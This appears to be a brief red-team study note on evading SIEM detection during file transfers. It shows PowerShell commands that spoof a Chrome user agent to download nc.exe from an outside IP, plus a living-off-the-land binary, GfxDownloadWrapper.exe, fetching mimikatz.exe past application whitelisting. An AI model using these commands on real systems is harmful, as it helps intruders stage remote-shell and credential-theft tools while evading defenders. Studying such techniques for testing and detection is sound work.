Detection And Evasion (FOR RT LATER)
File Transfer DaE
A lot of SIEM (Security Information and Event Management) are checking user-agents
to detect sus traffic. But user-agents
are not only used to identify web browsers, but anything acting as HTTP client and connecting to a web server via HTTP can have user agent string (like cURL
, custom Python
script or common tools like sqlmap
and nmap
). So File transfers could be detected.
Evasion Techniques
Changing User Agent:
Listing out User Agents
PS C:\>[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl
Request with Chrome User Agent
PS C:\> $UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome
PS C:\> Invoke-WebRequest http://13.13.13.13/nc.exe -UserAgent $UserAgent -OutFile "C:\Users\Public\nc.exe"
LOLBAS / GTFOBins
Application whitelisting may prevent you from using PowerShell or Netcat, but not from using Living Off the Land
Binaries. As example LOLBIN is the Intel Graphics Driver for Windows 10(GfxDownloadWrapper.exe), which could be used to file transfer
Transferring File with GfxDownloadWrapper.exe
PS C:\> GfxDownloadWrapper.exe "http://13.13.13.13/mimikatz.exe" "C:\Temp\nc.exe"
Last updated